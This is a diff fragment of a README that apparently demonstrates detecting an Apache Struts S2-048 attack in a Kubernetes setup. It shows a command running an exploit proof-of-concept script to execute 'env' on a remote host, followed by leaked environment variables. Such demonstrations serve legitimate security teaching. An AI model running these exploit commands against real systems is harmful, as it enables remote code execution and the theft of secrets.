bwolmarans/struts-sysdig/README.md

 cd ~/apache-struts2-PoC
 python exploitS2-048-cmd.py 12345.us-west-2.elb.amazonaws.com:8080 'env'

-...and we dump the environment to the CC server, not good!
+...and we dump the environment from our struts box, to our attacker "box" and see it on STDOUT... not good!

 KUBERNETES_SERVICE_PORT_HTTPS=443
 KUBERNETES_SERVICE_PORT=443